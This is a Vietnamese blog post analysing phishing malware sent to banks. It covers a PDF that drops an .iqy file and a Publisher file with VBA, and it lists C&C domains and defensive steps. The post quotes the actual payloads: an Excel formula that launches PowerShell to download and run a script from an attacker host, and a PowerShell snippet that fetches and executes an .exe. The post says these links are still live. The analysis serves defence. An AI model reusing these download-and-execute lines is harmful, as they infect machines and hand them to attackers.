Sunday, August 26, 2018

Chỉ là APT attack vô bank thôi mà làm quá

Đúng như tiêu đề, thực sự nếu đơn vị nào public ra ngoài internet hằng ngày hoặc đang có dịch vụ trọng yếu về kinh tế chính trị thì bị attack APT hay là các kiểu tấn công khác thì nhiều hơn cơm bữa. Vấn đề là bao nhiêu cái được phát hiện, bao nhiêu cái được xử lý, và xử lý ở mức độ nào mới quan trọng.

 Lưu ý: Tất cả các link độc hại đều vẫn còn online, người đọc nên cẩn trọng khi click

Thôi vào vấn đề chính! Nghe đồn đợt này đang có tấn công APT nhắm vào banking, ATM gì gì đó, ... Góc nhìn của mình thì chuyện dĩ nhiên và rất bình thường :D

Ông anh làm bên ngân hàng bạn báo có mẫu APT mới đang attack, cá nhân mình rất đánh giá cao cảnh báo kiểu này. Đang bận đọc báo về tỉ phú-làm giàu không vì bán tài nguyên quốc gia hay đầu độc dân tộc-xử lý chuyện gia đình. Cũng ráng ngó qua em nó xíu :D
Nhìn lướt qua mấy kiểu APT attack gần đây thì toàn phishing đính kèm file các kiểu. Quanh đi quẩn lại chỉ có 3 loại, PDF, M$ Office và Exploit cả hai cái trên :v

Thì mẫu đầu tiên là PDF.

Nhận được file thì vài thủ thuật nhỏ ta biết định dạng file luôn mặc dù ông anh gửi đã modify để tránh trường hợp click nhầm :D

https://www.virustotal.com/#/file/21afdc9bba64dc35900871f6876efd426ca33a96535c0529dc8d55ad27678073/detection => Lúc đầu hình như chỉ có 4-5 AV detect được :D mà kệ mịa đi, không nên đặt niềm tin vào hãng trong những trường hợp này :v

Dễ dàng ta thấy(quen thói thích thể hiện từ thời phổ thông)

Thông thường thì ta quan tâm đến nhóm màu cam, nhưng trong trường hợp này thì chỉ cần màu đỏ là đủ rồi :D
Theo như kết quả từ mấy câu lệnh nhảm nhí thì nó drop ra một file *.iqy sau đó execute lên thôi mà :D
nó sẽ dowload file hxxp://g50e.com/dab.1 về và thực thi. Trong đó có đoạn code rất tầm thường như sau:

='cmd'|' /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -sta -nop -c IEX ((new-object net.webclient).downloadstring(\"http://g50e.com/dub.2\"))'!A0

Nhìn lướt qua thì thấy nó download thêm thằng nào nữa từ C&C server.
[430]$ curl http://g50e.com/dub.2
$cheds = "http://g50e.com/security",""foreach($ched in $cheds){
Try{ 
$tp = "$env:temp\total.exe"$wc = New-Object System.Net.WebClient$wc.DownloadFile($ched, $tp)Start-Process $tpbreak 
} 
Catch{} 
}


Ờ thì download thêm một thanh niên nữa về execute lên thôi mà. Report thằng này là được rồi :D
https://www.virustotal.com/#/file/2b4f1c3755982b71bc709e4ddf101fd713f8d64fcbe1f251f4e22c8ffe69907b/detection
 Đến đây là đi nhậu được rồi :D

Mẫu OLE 

Mẫu tiếp theo là mình nhận trực tiếp từ khách hàng của mình, họ dùng mấy tool chuyên về web
https://www.virustotal.com/#/file/bc09a4f2218993ef8d3b9136ceee5f162c67fd27a5cd3a6b9a6ab5704c932e9b/detection
File *.pub có thể hơi lạ nhưng nó chỉ là OLE file mà thôi :D Nên đám này thường sẽ có hai hướng: 1 là exploit app, 2 là nhúng VBA.
Nhìn lướt qua thì nó nhúng VBA chắc luôn
Nhìn đoạn code là thấy ngu ngu rồi, không rõ ràng nên phải extract file kia ra đề biết nó download cái nồi gì về :D
Ừ thì đại loại nó download file hxxp://r48t.com/input về đổi tên thành appkey.exe và thực thi thôi
https://www.virustotal.com/#/file/5f8578deeaf3188ad284136f923afaff79b8334525bb26d9bd545f13627bb86d/detection
Đến giờ chẳng được mấy thằng AV detect.

Tổng kết 
- Đừng bao giờ tin tưởng quá vào Anti-Virus
- C&C domain:
  • f67i.com 
  • g78k.com
  • g50e.com
  • r48t.com
Thực ra còn vài mẫu nữa nhưng cơ chế chung cũng kiểu như vậy, và phần khác là một số anh em bank khác không gửi mẫu trực tiếp nên mình cũng không có cơ sở phân tích tiếp.
- Người làm an toàn thông tin cho bank nên làm gì:

  • Chặn ngay các truy cập đến domain và IP tương ứng 
  • Rà soát lại hệ thống có bao nhiêu người đã tải malware về và xử lý.
  • Chặn luôn các email phát tán malware => Mai tỉnh thì update sau :v
  • Join cộng đồng làm security cho bank để chia sẻ các case nghi ngờ hoặc nhận thông tin cập nhật để phòng thủ tốt hơn. 


Posted by at No comments:
Labels: , , , , , ,
Subscribe to: Posts (Atom)